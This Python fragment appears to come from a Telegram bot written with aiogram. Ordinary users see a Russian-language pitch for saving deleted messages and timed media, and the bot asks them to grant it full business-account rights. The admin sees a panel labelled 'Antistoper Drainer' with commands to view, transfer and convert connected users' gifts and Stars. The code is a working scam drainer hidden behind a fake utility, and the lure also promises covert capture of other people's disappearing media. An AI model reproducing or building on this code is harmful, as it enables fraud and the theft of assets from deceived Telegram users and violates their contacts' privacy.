@dp.message(F.text == "/start")
async def start_command(message: Message):
    try:
        connections = load_connections()
        count = len(connections)
    except Exception:
        count = 0

    if message.from_user.id != ADMIN_ID:
        keyboard = InlineKeyboardMarkup(inline_keyboard=[
            [InlineKeyboardButton(text="🎥 Демонстрация работы", callback_data="demo_videos")]
        ])

        photo = FSInputFile("connect.jpg")
        await message.answer_photo(photo=photo, caption="🕵️‍♂️ <b>Наш бот создан для отслеживания действий собеседников в переписке</b>\n\n<blockquote>\n• Если ваш собеседник изменит или удалит сообщение — вы моментально об этом узнаете 📳\n• Также бот умеет скачивать одноразовые (отправленные с таймером) фото, видео, голосовые и кружки ⏳\n• Работает даже пока вы оффлайн 📴\n</blockquote>\n❓<b>Как подключить бота — смотри на картинке</b> 👆\nИмя бота: <code>@SaveModing_bot</code> (скопируйте для подключения)\n\n❗Для корректной работы боту требуются <b>все права</b>\n\nДемонстрация работы бота:", reply_markup=keyboard, parse_mode="HTML")
    else:
        await message.answer(f"Antistoper Drainer\n\n🔗 Количество подключений: {count}\n\n/gifts - просмотреть гифты\n/stars - просмотреть звезды\n/transfer <owned_id> <business_connect> - передать гифт вручную\n/convert - конвертировать подарки в звезды")

@dp.callback_query(F.data == "demo_videos")
async def demo_videos_handler(callback: CallbackQuery):
    await callback.answer()

    media = [
        InputMediaVideo(media=FSInputFile("sources/ayugram-1.mp4"), caption="<b>Демонстрация работы бота 🚀</b>\n\n<b>Видео 1:</b> Скачивание медиа с таймером\n<b>Видео 2:</b> Уведомление об изменении сообщения собеседником\n<b>Видео 3:</b> Уведомление об удалении сообщения собеседником\n\n📴 <b>Бот работает даже когда вы оффлайн!</b>", parse_mode="HTML"),
        InputMediaVideo(media=FSInputFile("sources/ayugram-2.mp4"), caption="🎬 Часть 2"),
        InputMediaVideo(media=FSInputFile("sources/ayugram-3.mp4"), caption="🎬 Часть 3"),
    ]


    await callback.message.answer_media_group(media=media)